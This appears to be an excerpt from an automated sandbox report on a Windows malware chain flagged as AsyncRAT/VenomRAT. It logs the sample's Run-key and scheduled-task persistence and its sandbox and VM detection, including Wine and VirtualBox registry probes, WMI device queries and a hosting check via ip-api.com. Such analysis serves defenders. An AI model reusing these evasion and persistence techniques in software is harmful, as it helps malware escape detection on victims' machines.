Source: C:\Users\user\AppData\Local\Temp\1013557001\25045de666.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013557001\25045de666.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1013557001\25045de666.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1013557001\25045de666.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013557001\25045de666.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1013557001\25045de666.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1013557001\25045de666.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013560001\c20459f2e6.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1013560001\c20459f2e6.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013560001\c20459f2e6.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1013560001\c20459f2e6.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1013560001\c20459f2e6.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013560001\c20459f2e6.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1013560001\c20459f2e6.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1013560001\c20459f2e6.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013560001\c20459f2e6.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1013557001\25045de666.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1013557001\25045de666.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013557001\25045de666.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1013557001\25045de666.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1013557001\25045de666.exe	Window searched: window name: PROCMON_WINDOW_CLASS

Source: C:\Users\user\Documents\CAFIJKFHIJ.exe

File created: C:\Windows\Tasks\skotes.job

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run d985563cac.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run d985563cac.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 25045de666.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 25045de666.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run f1628a2a52.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run f1628a2a52.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 1124f3753f.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 1124f3753f.exe	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe

Key value created or modified: HKEY_CURRENT_USER\SOFTWARE\FF6BC8E90A1001FE1454 B68D9D96AF261CD1103255A35838E4D8112598F1A15D860C7B932EE098EE143C

Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013558001\f1628a2a52.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013558001\f1628a2a52.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013559001\1124f3753f.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013559001\1124f3753f.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013559001\1124f3753f.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013559001\1124f3753f.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013559001\1124f3753f.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013559001\1124f3753f.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013559001\1124f3753f.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013559001\1124f3753f.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013559001\1124f3753f.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013559001\1124f3753f.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013559001\1124f3753f.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013559001\1124f3753f.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013559001\1124f3753f.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013559001\1124f3753f.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013559001\1124f3753f.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013559001\1124f3753f.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013558001\f1628a2a52.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013558001\f1628a2a52.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AsyncRAT

Source: Yara match

File source: 0000000D.00000003.2439904797.0000000005540000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected VenomRAT

Source: Yara match

File source: Process Memory Space: n4e23hz.exe PID: 5724, type: MEMORYSTR

Check if machine is in data center or colocation facility

Source: global traffic

HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	Evasive API call chain: GetPEB, DecisionNodes, ExitProcess
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Evasive API call chain: GetPEB, DecisionNodes, ExitProcess

Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	System information queried: FirmwareTableInformation
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	System information queried: FirmwareTableInformation
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	System information queried: FirmwareTableInformation

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1013551001\b24ae367e7.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1013551001\b24ae367e7.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1013557001\25045de666.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1013557001\25045de666.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1013559001\1124f3753f.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1013559001\1124f3753f.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1013557001\25045de666.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1013557001\25045de666.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1013560001\c20459f2e6.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1013560001\c20459f2e6.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1013557001\25045de666.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1013557001\25045de666.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: n4e23hz.exe, 0000000D.00000003.2439904797.0000000005540000.00000004.00001000.00020000.00000000.sdmp

Binary or memory string: TASKMGR.EXE#PROCESSHACKER.EXE

Tries to detect virtualization through RDTSC time measurements

